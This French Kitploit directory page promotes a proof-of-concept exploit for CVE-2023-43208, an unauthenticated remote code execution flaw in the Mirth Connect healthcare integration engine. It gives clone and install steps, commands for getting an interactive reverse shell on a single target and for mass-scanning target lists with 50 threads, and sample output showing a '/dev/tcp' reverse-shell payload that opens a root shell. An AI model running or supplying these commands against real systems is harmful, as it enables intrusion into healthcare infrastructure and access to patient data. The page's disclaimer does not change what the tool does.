Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-43208 — Exploit RCE non authentifié pour CVE-2023-43208 dans Mirth Connect via une désérialisation XML, avec détection de version, analyse en masse et shell PTY interactif. | Kitploit
Outils/GitHubGitHub/4nuxd/cve-2023-43208
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

Exploit RCE non authentifié pour CVE-2023-43208 dans Mirth Connect via une désérialisation XML, avec détection de version, analyse en masse et shell PTY interactif.

Voir le dépôt
12il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43208 — Mirth Connect RCE

Python CVE Plateforme

Exploit de preuve de concept pour CVE-2023-43208, une vulnérabilité d'exécution de code à distance non authentifiée dans Mirth Connect versions antérieures à 4.4.1.


Description

Mirth Connect est un moteur d'intégration de soins de santé open-source largement déployé. Cette vulnérabilité exploite une faille de désérialisation Java via le point de terminaison /api/users en utilisant une charge utile XML conçue pour chaîner des gadgets Apache Commons Collections afin d'obtenir une RCE non authentifiée. La version améliorée remplace l'écouteur pwncat original par un shell PTY interactif sans dépendance, utilisant uniquement les modules natifs de Python (socket, , , ). Le shell est automatiquement mis à niveau vers un PTY complet lors de la connexion.

select
tty
termios

Versions affectées

LogicielVersions vulnérablesVersion corrigée
Mirth Connect< 4.4.14.4.1+

Fonctionnalités

  • Détection automatique de l'instance Mirth Connect
  • Empreinte de version et vérification de vulnérabilité
  • RCE non authentifiée via charge utile de désérialisation XML
  • Mise à niveau automatique du shell PTY (repli python3/python/script)
  • Propagation correcte de la taille du terminal (stty rows/cols)
  • Scanner de masse avec support multi-threading
  • Sortie des cibles vulnérables dans un fichier
  • Aucune dépendance pwncat — uniquement la bibliothèque standard pour l'écouteur

Installation

root@kitploit:~
git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

Prérequis

root@kitploit:~
requests
packaging
rich
alive-progress

Utilisation

Cible unique — Obtenir un shell

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

Cible unique — Avec ngrok / Port de liaison

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

Scan groupé depuis un fichier

root@kitploit:~
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

Arguments

OptionDescription
-u, --urlURL cible
-lh, --lhostVotre IP d'écoute
-lp, --lportVotre port d'écoute
-bp, --bindportRemplacement du port de liaison (utile avec ngrok)
-f, --fileFichier contenant la liste des URL cibles
-o, --outputEnregistrer les cibles vulnérables dans un fichier
-t, --threadsNombre de threads pour le scan (défaut : 50)

Exemple de sortie

root@kitploit:~
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

Avertissement

Cet outil est destiné uniquement à des tests de pénétration autorisés et à des fins éducatives.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement la permission de tester est illégale.
Les auteurs ne sont pas responsables de toute mauvaise utilisation ou des dommages causés par cet outil.


Crédits

  • Codé par : K3ysTr0K3R et Chocapikk
  • Amélioré par : 4nuxd
Télécharger l’outil